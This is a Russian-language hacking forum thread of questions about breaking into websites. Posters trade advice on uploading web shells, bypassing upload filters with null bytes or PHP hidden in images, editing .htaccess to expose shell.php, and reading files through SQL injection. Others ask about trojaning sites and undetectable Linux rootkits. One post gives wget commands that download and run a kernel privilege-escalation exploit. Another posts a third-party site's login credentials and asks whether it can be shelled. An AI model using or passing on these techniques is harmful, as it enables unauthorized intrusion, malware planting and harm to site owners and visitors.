Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)




    посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
     
    3 people like this.
  2. karencho777

    karencho777 New Member

    Joined:
    20 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    нашел уязвимость "вставление пхп кода":pHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
    как можно етим воспользоватса?
    еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
     
  3. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
     
  4. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

    p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex
     
    #12784 apolon47, 8 May 2010
    Last edited: 8 May 2010
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

    wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    tar xvfz 2009-linux-sendpage3.tar.gz
    chmod 777 linux-sendpage3 -R
    cd linux-sendpage3
    ./run
     
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса
     
  7. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    подниму вопрос свой

     
  8. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.
     
  9. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    А не легче ли поправить хешь админа потом зайти под его правами и дать себе полномочия.
     
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Есть файл .htaccess
    в нем

    <Files *>
    Order Allow,Deny
    Alow from All
    </Files>

    из-за него выдает ошибку 500 какуюто.

    Нужно шоб файлл shell.php читался свободно!
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    <Files *.php>
    Order Allow,Deny
    Alow from All
    </Files>
     
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    попугай
    да там все файлы .php
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    <Files shell.php>
    Order Allow,Deny
    Alow from All
    </Files>
     
  14. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    какой руткит под линукс посоветуете? какой лучше и не палится?
     
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    попугай а так пишет что пра не хватает!
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    На сайте есть загрузка pdf,doc,jpg файлов.

    Заливаю шелл: shell.php
    Выводит такую ошибку: shell.php already exists

    Пробую так: shell.php.pdf
    Выводит: shell.php.pdf already exists

    Как здесь обойти фильтрацию?
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    asdklhasdjasdjkasdhjkasdhdkhhasdas.php уплоадь.
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.acforum.net/index.php?pid=40&lang=1

    username:Neil Kirkman
    password:neilk

    Здесь реально залить шелл?
     
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    1. Можно тупо вставить код php в jpg
    2. Поколдавать с %00
     
  20. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    478
    Likes Received:
    483
    Reputations:
    99
    Да, выслал в ПМ
     
    #12800 wildshaman, 9 May 2010
    Last edited: 9 May 2010
    2 people like this.
Loading...
Thread Status:
Not open for further replies.